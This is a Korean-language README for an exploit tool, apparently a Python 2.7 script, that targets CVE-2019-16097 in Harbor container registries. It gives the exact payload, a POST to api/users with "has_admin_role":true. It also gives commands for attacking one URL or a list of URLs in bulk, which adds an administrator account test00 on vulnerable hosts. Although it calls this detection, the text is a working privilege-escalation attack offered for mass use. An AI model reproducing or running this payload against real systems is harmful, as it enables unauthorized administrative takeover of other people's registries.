
harbor(<1.7.6/1.8.3) 권한 상승 (CVE-2019-16097)
201909 harbor에서 등록 기능을 이용해 관리자를 추가할 수 있는 취약점이 공개되었다. 등록 인터페이스 api/users를 이용해 POST 매개변수 "has_admin_role":true를 구성하면 바로 관리자를 추가할 수 있다.
본 도구는 단일 url 또는 일괄 감지를 지원한다.
python2.7
pip install requests
사용 도움말: python harbor-give-me-admin.py -h

단일 url 감지: python harbor-give-me-admin.py -u "https://www.xxx.com/"
//이용에 성공하면 관리자 계정 test00이 추가됩니다. 주의해서 실행하세요!

일괄 감지: python harbor-give-me-admin.py -f urls,txt
//이용에 성공하면 관리자 계정 test00이 추가됩니다. 주의해서 실행하세요!
gmail:[email protected]